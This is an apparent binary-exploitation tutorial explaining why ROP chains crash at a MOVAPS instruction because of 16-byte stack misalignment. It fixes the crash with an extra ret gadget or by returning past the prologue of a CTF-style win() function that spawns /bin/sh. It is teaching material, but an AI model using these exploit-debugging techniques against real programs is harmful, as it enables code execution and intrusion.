The Infamous MOVAPS issue

If you are attempting to write a ROP chain, and your program crashes at some weird movaps instruction, chances are that you are facing a stack alignment issue. This is also the cause of many exploits "working locally but not remotely".

Analyzing a MOVAPS crash

Let's first look at what a typical crash brought about by MOVAPS looks like in GDB.

movaps issue illustrated in GDB

As you can see, the program crashes with Segmentation Fault upon hitting the movaps instruction.

*RSP  0x7fffa09ee928 ◂— 0x0
...
<_int_malloc+2832>    movaps xmmword ptr [rsp + 0x10], xmm1

Looking at this movaps documentation, it mentions that

When the source or destination operand is a memory operand, the operand must be aligned on a 16-byte (0x10) boundary or a general-protection exception (#GP) is generated.

This basically means that our memory address that is referenced has to be a multiple of 0x10 bytes. However, in this case, our memory operand is 0x7fffa09ee928+0x10=0x7fffa09ee938 -- evidently not a multiple of 0x10.

Fixing the MOVAPS issue

In order to align our stack, we simply have to increment or decrement our RSP by 0x8. This means that as long as we push or pop a value on our stack before we call the function, we should be able to align our stack! There's so many different ways we can do this, but I will cover the two simplest way.

Add an additional ret

Assuming that you have a ROP chain, we can simply add a ret instruction/gadget before we call our function.

Tip

ret is functionally the same as pop rip.

Skip the function prologue

Assume we are trying to call a function win() that looks like this

void win() {
    system("/bin/sh");
}

The assembly for such a function will look like this:

Dump of assembler code for function win:

   // function prologue
   win+0:     endbr64
   win+4:     push   rbp
   win+5:     mov    rbp,rsp

   // load argument
   win+8:     lea    rax,[rip+0xeac]        # 0x2004
   win+15:    mov    rdi,rax

   // call system
   win+18:    call   0x1050 <system@plt>

   // function epilogue
   win+23:    nop
   win+24:    pop    rbp
   win+25:    ret

As we can see, the only relevant part of the code starts from win+8.

If we face a movaps issue, we can simply return to win+5 or win+8 directly, skipping the initial push rbp instruction.

This would offset our RSP by 8, and fix the stack alignment issue (if any).